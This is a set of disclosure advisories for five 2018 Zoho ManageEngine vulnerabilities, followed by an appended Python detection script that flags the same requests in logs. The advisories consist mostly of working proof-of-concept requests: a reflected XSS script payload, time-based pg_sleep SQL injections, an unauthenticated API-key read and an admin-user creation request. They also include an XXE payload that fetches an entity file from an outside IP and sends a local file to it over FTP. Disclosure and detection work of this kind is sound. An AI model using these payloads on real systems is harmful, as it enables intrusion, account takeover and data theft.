[CVE-2018-15169] Zoho ManageEngine Applications Manager Reflected XSS
Zoho ManageEngine Applications Manager 13 (13810 build) Reflected XSS
Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-15169
I found a Reflected XSS in the Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in a /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET request.
Proof of Concept
/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=
Notice: This vulnerability can be reproduced without logging in.
The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
[CVE-2018-17283] Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
Firewall Analyzer 12.3 Build 123183 has a permission bypass vulnerability which can lead to information disclosure and SQL injection.
Proof of Concept:
Retrieving the API key without authentication:
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
PoC: adding an admin user using only the API key:
POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&[email protected]&privilege=Administrator&[email protected]&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close
-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"
-----------------------------195342410120122
Content-Disposition: form-data; name="password"
test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"
undefined
-----------------------------195342410120122--
PoC: SQL injection using only the API key:
POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
name=KcP7OGhC';select%20pg_sleep(1);%20--
[CVE-2018-13050] Zoho ManageEngine Applications Manager SQL Injection vulnerability
Zoho ManageEngine Applications Manager SQL Injection vulnerability
Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-13050
Proof of Concept:
POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=
This is a time-based blind SQL injection vulnerability, so I used sqlmap to exploit it. The following is a proof screenshot.
[sqlmap proof screenshots omitted: databases, user, table, data]
[CVE-2018-18980] Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
An XML External Entity injection (XXE) vulnerability exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.
The evil.xml hosted on my VPS:
<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;
I used the FTP protocol to read the file; it can read the file c:\test.txt.
The test.txt is just a test file.
Then I used the PoC to request evil.xml from my VPS.
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>
The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the URL-encoded PoC.
http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E
On my VPS, I used a Python script that serves the FTP protocol to receive the data.
When I sent the request, I received the content of test.txt on my VPS.
[CVE-2018-15168] Zoho ManageEngine Applications Manager SQL Injection vulnerability
Zoho ManageEngine Applications Manager SQL Injection vulnerability
Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-15168
I found a SQL injection in the Zoho ManageEngine Applications Manager 13 (13810 build) via the resids parameter in a /editDisplaynames.do?method=editDisplaynames&resids=1 GET request.
Proof of Concept:
GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: close
This is a time-based blind SQL injection vulnerability, so I used sqlmap to exploit it. The following is a proof screenshot.
The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
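Added detection example, not part of the advisories above and not code from the author or the vendor: a small classifier that flags the request shapes reported in the five advisories when run over captured requests, so a defender can spot attempts against these endpoints in proxy or WAF logs. The sample requests are constructed, and the `classify_request` function, its `has_session` flag and the rule labels are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Each rule: (label, request path, parameter the advisory names as the injection point,
# pattern matched against the decoded value). Patterns are narrow on purpose.
PG_SLEEP = re.compile(r"'\s*;\s*select\s+pg_sleep\s*\(", re.I)
RULES = [
    ("CVE-2018-15169 reflected XSS", "/deleteMO.do", "method",
     re.compile(r"</?\s*(script|textarea)\b", re.I)),
    ("CVE-2018-13050 blind SQLi (login)", "/j_security_check", "j_username", PG_SLEEP),
    ("CVE-2018-15168 blind SQLi (resids)", "/editDisplaynames.do", "resids",
     re.compile(r"\d+\)\s*(and|or)\b|pg_sleep\s*\(", re.I)),
    ("CVE-2018-18980 XXE (RequestXML)", "/devices/ProcessRequest.do", "RequestXML",
     re.compile(r"<!(DOCTYPE|ENTITY)\b", re.I)),
    ("CVE-2018-17283 SQLi (setManaged)", "/api/json/device/setManaged", "name", PG_SLEEP),
]

def _params(encoded):
    """Decode a query string or form body; split on '&' only, first value wins."""
    out = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            out.setdefault(unquote_plus(key), unquote_plus(value))
    return out

def classify_request(target, body="", has_session=True):
    """Return labels of matched rules; has_session says whether a valid session was present."""
    split = urlsplit(target)
    params = _params(split.query)
    params.update(_params(body))  # form-body parameters override query parameters
    hits = [label for label, path, key, pat in RULES
            if split.path == path and key in params and pat.search(params[key])]
    # The API-key read is only the advisory's bypass when no session was presented.
    if (split.path == "/oputilsServlet" and params.get("action") == "getAPIKey"
            and not has_session):
        hits.append("CVE-2018-17283 unauthenticated API key read")
    return hits

# Constructed samples mirroring the PoC requests above, plus one benign request.
SAMPLE = [
    ("/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(1)</script>//", "", True),
    ("/j_security_check", "submit=Login&j_username=x';select%20pg_sleep(0);%20--%20&j_password=p", False),
    ("/editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744", "", True),
    ("/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%21DOCTYPE%20root%20%5B%5D%3E%3Croot%2F%3E", "", True),
    ("/oputilsServlet?action=getAPIKey", "", False),
    ("/api/json/device/setManaged?apiKey=KEY&manage=false", "name=abc';select%20pg_sleep(1);%20--", True),
    ("/editDisplaynames.do?method=editDisplaynames&resids=1", "", True),
]
for target, body, session in SAMPLE:
    print(classify_request(target, body, session) or ["clean"], "<-", target[:50])
```

Because the login, `setManaged` and `addUser` requests carry their payload in the POST body, this only catches them where the proxy or WAF logs request bodies; the GET-based cases are visible in ordinary access logs.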